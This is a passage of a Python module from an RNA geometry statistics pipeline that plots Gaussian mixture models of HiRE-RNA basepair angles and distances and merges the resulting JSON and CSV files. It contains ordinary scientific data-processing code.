    Please see Cragnolini & al 2015 to understand them.
    """
    setproctitle("GMM (HiRE-RNA basepairs)")

    df = pd.read_csv(os.path.abspath(runDir + "/results/geometry/HiRE-RNA/basepairs/basepairs_HiRERNA.csv"))

    # The 18 Leontis-Westhof geometric families (cis/trans x W/H/S edge combinations)
    lw_families = ["cWW", "tWW", "cWH", "tWH", "cHW", "tHW", "cWS", "tWS", "cSW",
                   "tSW", "cHH", "tHH", "cSH", "tSH", "cHS", "tHS", "cSS", "tSS"]
    nucleotides = ['A', 'C', 'G', 'U']

    os.makedirs(runDir + "/results/figures/GMM/HiRE-RNA/basepairs/", exist_ok=True)
    os.chdir(runDir + "/results/figures/GMM/HiRE-RNA/basepairs/")

    # One figure per (LW family, nucleotide pair) combination that has measurements
    for family in lw_families:
        family_rows = df[df['type_LW'] == family ]
        if not len(family_rows):
            continue
        for nt1 in nucleotides:
            for nt2 in nucleotides:
                pair_rows = family_rows[(family_rows.nt1_res == nt1) & (family_rows.nt2_res == nt2)]
                if len(pair_rows):
                    gmm_hrna_basepair_type(family, nt1 + nt2, pair_rows, scan)

    os.chdir(runDir)
    setproctitle("GMM (HiRE-RNA basepairs) finished")
@trace_unhandled_exceptions
def gmm_hrna_basepair_type(type_LW, ntpair, data, scan):
    """
    Plot the statistical figures of one HiRE-RNA basepair type.

    Produces a single two-panel figure for the given Leontis-Westhof family and
    nucleotide pair: the superposed GMMs of the plane/torsion angles on top,
    and the superposed GMMs of the distances below.

    type_LW: Leontis-Westhof family name (e.g. "cWW")
    ntpair:  the two paired nucleotides, concatenated (e.g. "GC")
    data:    DataFrame restricted to this family and nucleotide pair
    scan:    forwarded to GMM_histo
    """
    setproctitle(f"GMM (HiRE-RNA {type_LW} basepairs)")

    # unused "figure =" binding removed: plt state is accessed through gcf()/subplot()
    plt.figure(figsize=(10, 10))
    plt.gcf().subplots_adjust(left=0.1, bottom=0.1, right=0.9, top=0.9, wspace=0, hspace=0.5)

    # Upper panel: angle parameters of the pair
    plt.subplot(2, 1, 1)
    GMM_histo(data["211_angle"], f"{type_LW}_{ntpair}_C1'-B1-B1pair", scan, toric=True, hist=False, col='cyan')
    GMM_histo(data["112_angle"], f"{type_LW}_{ntpair}_B1-B1pair-C1'pair", scan, toric=True, hist=False, col='magenta')
    GMM_histo(data["3211_torsion"], f"{type_LW}_{ntpair}_C4'-C1'-B1-B1pair", scan, toric=True, hist=False, col='black')
    GMM_histo(data["1123_torsion"], f"{type_LW}_{ntpair}_B1-B1pair-C1'pair-C4'pair", scan, toric=True, hist=False, col='maroon')
    GMM_histo(data["alpha1"], f"{type_LW}_{ntpair}_alpha_1", scan, toric=True, hist=False, col="yellow")
    GMM_histo(data["alpha2"], f"{type_LW}_{ntpair}_alpha_2", scan, toric=True, hist=False, col='olive')
    plt.xlabel("Angle (degree)")
    plt.title(f"GMM of plane angles for {type_LW} {ntpair} basepairs", fontsize=10)

    # Lower panel: distance parameters of the pair
    plt.subplot(2, 1, 2)
    GMM_histo(data["Distance"], f"{type_LW}_{ntpair}_tips_distance", scan, toric=False, hist=False, col="cyan")
    GMM_histo(data["dB1"], f"{type_LW}_{ntpair}_dB1", scan, toric=False, hist=False, col="tomato")
    GMM_histo(data["dB2"], f"{type_LW}_{ntpair}_dB2", scan, toric=False, hist=False, col="goldenrod")
    plt.xlabel("Distance (Angströms)")
    plt.title(f"GMM of distances for {type_LW} {ntpair} basepairs", fontsize=10)

    plt.savefig(f"{type_LW}_{ntpair}_basepairs.png")
    plt.close()
    setproctitle(f"GMM (HiRE-RNA {type_LW} {ntpair} basepairs) finished")
@trace_unhandled_exceptions
def merge_jsons(do_hrna):
    """
    Reads the tons of JSON files produced by the geometric analyses, and compiles them into fewer files.
    It is simple concatenation of the JSONs.
    The original files are then deleted.

    do_hrna: if True, also merge the HiRE-RNA JSON files (distances, angles,
             torsions, and basepair parameters).
    """

    def to_paths(names):
        # Map measurement names to their JSON file paths
        return [ runDir + "/results/geometry/json/" + x + ".json" for x in names ]

    def remove_files(paths):
        # Delete intermediate files, ignoring those that do not exist
        # (e.g. a measurement that yielded no data never wrote its JSON)
        for path in paths:
            try:
                os.remove(path)
            except FileNotFoundError:
                pass

    # All atom distances
    bonds = to_paths(["O3'-P", "P-OP1", "P-OP2", "P-O5'", "O5'-C5'", "C5'-C4'", "C4'-O4'", "C4'-C3'", "O4'-C1'", "C1'-C2'", "C2'-O2'", "C2'-C3'", "C3'-O3'", "C1'-N9",
                      "N9-C8", "C8-N7", "N7-C5", "C5-C6", "C6-O6", "C6-N6", "C6-N1", "N1-C2", "C2-N2", "C2-N3", "N3-C4", "C4-N9", "C4-C5",
                      "C1'-N1", "N1-C6", "C6-C5", "C5-C4", "C4-N3", "N3-C2", "C2-O2", "C2-N1", "C4-N4", "C4-O4"])
    concat_jsons(bonds, runDir + "/results/geometry/json/all_atom_distances.json")

    # All atom torsions ("Xhi" is the historical label used for chi)
    torsions = to_paths(["Alpha", "Beta", "Gamma", "Delta", "Epsilon", "Xhi", "Zeta"])
    concat_jsons(torsions, runDir + "/results/geometry/json/all_atom_torsions.json")

    # Delete previous files
    remove_files(bonds + torsions)

    if do_hrna:
        # HiRE-RNA distances
        hrnabonds = to_paths(["P-O5'", "O5'-C5'", "C5'-C4'", "C4'-C1'", "C1'-B1", "B1-B2", "C4'-P"])
        concat_jsons(hrnabonds, runDir + "/results/geometry/json/hirerna_distances.json")

        # HiRE-RNA angles
        hrnaangles = to_paths(["P-O5'-C5'", "O5'-C5'-C4'", "C5'-C4'-C1'", "C4'-C1'-B1", "C1'-B1-B2", "C4'-P-O5'", "C5'-C4'-P", "C1'-C4'-P"])
        concat_jsons(hrnaangles, runDir + "/results/geometry/json/hirerna_angles.json")

        # HiRE-RNA torsions
        hrnators = to_paths(["P-O5'-C5'-C4'", "O5'-C5'-C4'-C1'", "C5'-C4'-C1'-B1", "C4'-C1'-B1-B2", "C4'-P°-O5'°-C5'°", "C5'-C4'-P°-O5'°", "C1'-C4'-P°-O5'°", "O5'-C5'-C4'-P°"])
        concat_jsons(hrnators, runDir + "/results/geometry/json/hirerna_torsions.json")

        # HiRE-RNA basepairs: one merged file per nucleotide pair
        for nt1 in ['A', 'C', 'G', 'U']:
            for nt2 in ['A', 'C', 'G', 'U']:
                bps = glob.glob(runDir + f"/results/geometry/json/*{nt1}{nt2}*.json")
                concat_jsons(bps, runDir + f"/results/geometry/json/hirerna_{nt1}{nt2}_basepairs.json")

        # Delete previous files: the per-measurement JSONs, then the per-basepair
        # JSONs (named after the LW families, hence starting with 't' or 'c')
        # and the tips_distance JSONs.
        remove_files(hrnabonds + hrnaangles + hrnators)
        remove_files(glob.glob(runDir + "/results/geometry/json/t*.json"))
        remove_files(glob.glob(runDir + "/results/geometry/json/c*.json"))
        remove_files(glob.glob(runDir + "/results/geometry/json/*tips_distance.json"))
@trace_unhandled_exceptions
def concat_worker(bunch):
    """
    Concatenates a bunch of CSV files and returns a Pandas DataFrame.
    bunch: List of strings (filepaths to CSV files)
    The function logs concatenations to a global TQDM progress bar.
    The function is expected to be used in parallel.

    NOTE: assumes bunch is non-empty (the first pop() would raise IndexError
    otherwise) — guaranteed by the chunking in concat_dataframes, to confirm
    for other callers.
    """
    global sharedpbar
    global finished

    # initiate the dataframe with the first CSV file
    df_tot = pd.read_csv(bunch.pop(), engine="c")
    with finished.get_lock():
        finished.value += 1

    # idiom fix: the original iterated `for f in range(len(bunch))` with an
    # unused index while consuming the list via pop(); `while bunch` says it directly.
    while bunch:
        # Read and concatenate a new file
        df = pd.read_csv(bunch.pop(), engine='c')
        df_tot = pd.concat([df_tot, df], ignore_index=True)

        # Update the global progress bar
        with finished.get_lock():
            finished.value += 1
        with sharedpbar.get_lock():
            sharedpbar.n = finished.value
            sharedpbar.refresh()

    return df_tot
@trace_unhandled_exceptions
def concat_dataframes(fpath, outfilename, nworkers):
    """
    Concatenates the CSV files from fpath folder into a DataFrame gathering all.
    The function splits the file list into nworkers concatenation workers, and then merges the nworkers dataframes.
    """
    setproctitle(f"Concatenation of {fpath}")

    # Get the list of files, shuffled to even out the workload per worker
    flist = os.listdir(fpath)
    random.shuffle(flist)
    flist = [ os.path.abspath(fpath + fname) for fname in flist ]

    # Define a global progress bar to be shared between workers
    global sharedpbar
    global finished
    sharedpbar = tqdm(total=len(flist), position=0, desc="Preparing "+outfilename, leave=False)
    finished = Value('i', 0)

    # Divide the list into nworkers chunks of equal size; the last one takes the remainder
    size = int(len(flist)/nworkers)+1
    chunks = [ flist[i*size:(i+1)*size] for i in range(nworkers-1) ]
    chunks.append(flist[(nworkers-1)*size:])

    # Run parallel concatenations
    p = Pool(initializer=init_with_tqdm, initargs=(tqdm.get_lock(),), processes=nworkers)
    results = p.map(concat_worker, chunks, chunksize=1)
    p.close()
    p.join()
    sharedpbar.close()

    # Concatenate the per-worker results and save
    pd.concat(results, ignore_index=True).to_csv(fpath + outfilename)
@trace_unhandled_exceptions
def concat_jsons(flist, outfilename):
    """
    Reads JSON files computed by the geometry jobs and merge them into a smaller
    number of files
    """
    # Load every existing input file; missing ones are reported and skipped
    result = []
    for fname in flist:
        if not os.path.isfile(fname):
            warn("Unable to find " + fname.split('/')[-1])
            continue
        with open(fname, "rb") as infile:
            result.append(json.load(infile))

    # write the files
    with open(outfilename, 'w', encoding='utf-8') as out:
        json.dump(result, out, indent=4)
if __name__ == "__main__":
    # This module only defines helpers used by the statistics pipeline;
    # it has no standalone entry point.
    print("This file is not supposed to be run directly. Run statistics.py instead.")
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.